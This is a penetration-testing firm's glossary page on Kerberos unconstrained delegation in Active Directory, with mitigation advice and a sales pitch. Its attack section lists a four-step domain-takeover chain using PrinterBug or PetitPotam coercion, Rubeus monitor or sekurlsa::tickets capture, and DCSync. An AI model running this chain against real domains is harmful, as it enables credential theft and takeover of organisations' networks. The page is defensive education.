Active Directory · Term

What is unconstrained delegation?

Unconstrained delegation lets a server capture the full Kerberos ticket of anyone who connects to it, then reuse it anywhere. Coerce a Domain Controller to connect and the attacker owns the domain. Here is what it is and how to remove it.

Active Directory · TermAll services
TL;DR

Unconstrained delegation is a Kerberos setting (the TRUSTED_FOR_DELEGATION flag) that lets a server capture the full TGT of any user who authenticates to it and reuse that ticket to impersonate them anywhere. If an attacker controls such a server, they can coerce a Domain Controller to authenticate to it, capture the DC’s ticket, and take over the domain. It is the most dangerous delegation type, and it should exist on nothing but Domain Controllers.

By John Dill, Red Team Lead, SecureLayer7Updated

What unconstrained delegation is

When a computer is trusted for unconstrained delegation, any user who authenticates to it sends along a copy of their TGT, which the server caches. That lets the server act as that user toward *any* service, with no restriction, hence "unconstrained."

This was an early Kerberos feature for multi-tier applications, but it is extremely dangerous: a server with this setting that an attacker controls becomes a trap that collects the master credentials of everyone who connects.

The abuse and payload

The classic attack pairs unconstrained delegation with a coercion trick:

1. Compromise (or find attacker-controlled) a host trusted for unconstrained delegation. 2. Coerce a high-value target, ideally a Domain Controller, to authenticate to it: printerbug.py corp.local/user@dc-ip <attacker-host> or PetitPotam. 3. Capture the incoming TGT from memory: Rubeus.exe monitor or sekurlsa::tickets. 4. Reuse the DC’s TGT (Pass-the-Ticket) to run DCSync and take the domain.

Documented techniques shown for defensive awareness.

How to defend

  • Remove unconstrained delegation from every server that is not a Domain Controller; use constrained or resource-based delegation if delegation is genuinely needed.
  • Mark privileged accounts "sensitive and cannot be delegated" (or add them to Protected Users) so their TGT is never forwarded.
  • Mitigate coercion vectors (PrinterBug, PetitPotam) and restrict who can reach delegation hosts.
  • Monitor for coercion attempts and for TGTs being captured.
  • Enumerate regularly with BloodHound, which flags unconstrained delegation.

References

  1. [1]MITRE ATT&CK Enterprise Matrix(MITRE)
  2. [2]Microsoft: Best Practices for Securing Active Directory(Microsoft)
  3. [3]Microsoft: Kerberos Authentication Overview(Microsoft)
Related terms

Common questions

Active Directory, asked often

Need your Active Directory tested?

Scope an engagement

Test your Active Directory before an attacker does.

We run internal and Active Directory penetration tests that follow the real path from one low-privilege user to Domain Admin, then hand your team a report with reproducible evidence and a fix for every step. Free re-test included.

See all services30-min scoping call, fixed-price proposal in 48 hours.